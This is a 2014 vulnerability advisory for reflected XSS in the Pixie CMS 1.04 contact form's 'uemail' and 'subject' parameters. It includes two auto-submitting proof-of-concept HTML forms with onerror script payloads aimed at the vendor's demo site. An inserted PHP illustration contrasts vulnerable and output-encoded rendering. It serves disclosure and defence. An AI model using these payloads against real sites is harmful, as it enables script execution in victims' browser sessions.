Pixie CMS 1.04 Cross Site Scripting

Related Vulnerabilities: CVE-2014-3786  
Publish Date: 30 May 2014

Pixie CMS v1.04 (Contact form) POST XSS Vulnerabilities

Vendor: Pixie CMS
Product web page: http://www.getpixie.co.uk
Affected version: 1.04
Severity: Medium
CVE: CVE-2014-3786
Demo page: http://demo.getpixie.co.uk

Discovered by: Filippos Mastrogiannis (@filipposmastro)
         & Simone Memoli (@Simon90_Italy)

Pixie is a free, open source CMS, a.k.a. a small, simple website maker
(as the vendor states on its website).

Description: Pixie (v1.04) suffers from several POST XSS vulnerabilities in
the Contact form (contact.php). The user input passed through the POST
parameters 'uemail' and 'subject' is not properly sanitized, allowing an
attacker to execute HTML/script code in a user's browser session on the
affected site.

The vulnerable component is the contact module of Pixie v1.04; it can be
found at /pixie_v1.04/admin/modules/contact.php in the source code.
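The following is an added illustration, not code from the advisory and not Pixie's own contact.php: it reproduces the class of bug described above (POST fields reflected into HTML attribute values without encoding) next to a hardened rendering, using the two payloads from the proof of concept as constructed input. The field names, the $post array standing in for $_POST, and the render_form_* functions are assumptions made for the example.

```php
<?php
// Added example (not Pixie's code). Demonstrates the reflected-XSS pattern
// described in the advisory and the output-encoding fix for it.

// Constructed request standing in for $_POST; the values are the advisory's
// proof-of-concept payloads for the 'uemail' and 'subject' parameters.
$post = [
    'contact' => '1',
    'uemail'  => '"><img src=x onerror=prompt(document.domain);>',
    'subject' => '"><img src=x onerror=prompt(document.location);>',
];

// Vulnerable pattern (hypothetical, illustrating the bug class): the submitted
// values are echoed straight back into attribute values. A leading '">'
// in the input closes the attribute and the tag, and the rest becomes markup.
function render_form_unsafe(array $post): string {
    return '<input type="text" name="uemail" value="' . ($post['uemail'] ?? '') . '">' . "\n"
         . '<input type="text" name="subject" value="' . ($post['subject'] ?? '') . '">' . "\n";
}

// Hardened version: encode for the HTML attribute context. ENT_QUOTES turns
// both ' and " into entities, so the attribute cannot be closed early;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_form_safe(array $post): string {
    // Validate what can be validated: an e-mail field that fails validation
    // is simply not reflected back.
    $email = filter_var($post['uemail'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        $email = '';
    }
    // Free-text field: cap the length, then rely on encoding at output time.
    $subject = mb_substr($post['subject'] ?? '', 0, 200);

    return '<input type="text" name="uemail" value="' . h($email) . '">' . "\n"
         . '<input type="text" name="subject" value="' . h($subject) . '">' . "\n";
}

echo "--- unsafe rendering (payload becomes a live <img> tag) ---\n";
echo render_form_unsafe($post);
echo "--- hardened rendering (payload stays inert attribute text) ---\n";
echo render_form_safe($post);
```

Running it with `php example.php` prints the unsafe output with a real `<img ... onerror=...>` element outside the input tag, while the hardened output contains `value="&quot;&gt;&lt;img src=x onerror=prompt(document.location);&gt;"` for the subject and an empty value for the invalid e-mail address. The point to carry over to a review of contact.php is that the fix belongs at the point of output (encode for the context the value lands in), with input validation as a second layer where the field has a well-defined format.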

Tested on: Ubuntu 13.10 with Mozilla Firefox 29.0 / Microsoft Windows 7
with Mozilla Firefox 29.0.1

Proof Of Concept:

<html>
<title>Pixie CMS v1.04 Contact form (uemail parameter) XSS</title>
<form name="xss" action="http://demo.getpixie.co.uk/contact/" method="post">
<input type="hidden" name='uemail' value='"><img src=x onerror=prompt(document.domain);>'>
<input type="hidden" name='contact' value='1'>
<input type="hidden" name='subject' value='xss'>
</form>
<script>document.xss.submit();</script>
</html>

<html>
<title>Pixie CMS v1.04 Contact form (subject parameter) XSS</title>
<form name="xss" action="http://demo.getpixie.co.uk/contact/" method="post">
<input type="hidden" name='uemail' value='xss'>
<input type="hidden" name='contact' value='1'>
<input type="hidden" name='subject' value='"><img src=x onerror=prompt(document.location);>'>
</form>
<script>document.xss.submit();</script>
</html>


Disclosure Timeline:
 
[13.05.2014] Vulnerabilities discovered.
[13.05.2014] Initial contact with the vendor.
[15.05.2014] 1st response from the official maintainer.
[30.05.2014] 2nd response from the official maintainer.
[30.05.2014] Public security advisory released.